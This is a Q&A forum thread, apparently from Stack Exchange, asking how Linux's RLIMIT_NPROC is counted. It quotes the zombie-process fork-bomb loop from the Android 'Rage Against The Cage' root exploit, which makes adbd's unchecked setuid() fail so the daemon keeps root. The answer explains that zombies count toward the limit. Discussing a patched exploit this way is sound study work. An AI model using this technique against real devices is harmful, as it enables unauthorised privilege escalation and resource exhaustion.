What is the correct definition of RLIMIT_NPROC?

Question

I'm taking a look at the implementation of the Android exploit Rage Against The Cage. The idea behind it is that it creates as many processes as necessary to reach RLIMIT_NPROC for the shell UID so that the next time the Android Debug Bridge (ADB) daemon tried to drop its privileges from root to shell, the call to setuid() fails and it continues executing as root (that bug has been fixed by checking the result of the setuid() call before proceeding).

According to setrlimit() documentation, RLIMIT_NPROC is defined as:

The maximum number of processes (or, more precisely on Linux, threads) that can be created [emphasis mine] for the real user ID of the calling process. Upon encountering this limit, fork(2) fails with the error EAGAIN. This limit is not enforced for processes that have either the CAP_SYS_ADMIN or the CAP_SYS_RESOURCE capability.

Moreover, this is how the exploit was implemented:

/* generate many (zombie) shell-user processes so restarting
 * adb's setuid() will fail.
 * The whole thing is a bit racy, since when we kill adb
 * there is one more process slot left which we need to
 * fill before adb reaches setuid(). Thats why we fork-bomb
 * in a seprate process.
 */
if (fork() == 0) { // 'true' for the child
  close(pepe[0]);
  for (;;) {
    if ((p = fork()) == 0) {
      exit(0); // child exits (???)
    } else if (p < 0) {
      if (new_pids) {
        printf("\n[+] Forked %d childs.\n", pids);
        new_pids = 0;
        write(pepe[1], &c, 1);
        close(pepe[1]);
      }
    } else {
      ++pids;
    }
  }
}

So, RLIMIT_NPROC is defined as the "maximum number of processes that can be created" — created, not "execute at the same time" — and the implementation seconds that definition by terminating every child process created by the second fork.

First of all, I can't understand how limiting the number of process created per UID could possibly work (we'd have to restart our machines from time to time to reset that count, wouldn't we?). Second, even the guy who reverse engineered the exploit, obtaining an implementation equivalent to the one shown above, defines the RLIMIT_NPROC differently:

It [the exploit] takes advantage of RLIMIT_NPROC max, which is a value that defines how many processes a given UID can have running.

That said, how RLIMIT_NPROC actually works? Which definition is more precise?

score 1 · Answer 1 · answered Jul 05 '16 at 21:33

The limit is indeed the number of current processes, not the total number of processes created since the system started.

The key to how the exploit code worked is zombie processes. Even though the child processes have called exit(), they are still kept around by the operating system and count toward the limit until a parent process either abandons them or calls wait(). In this case, the parent does not do this, so they hang around until the parent itself exits.

What is the correct definition of RLIMIT_NPROC?

1 Answers1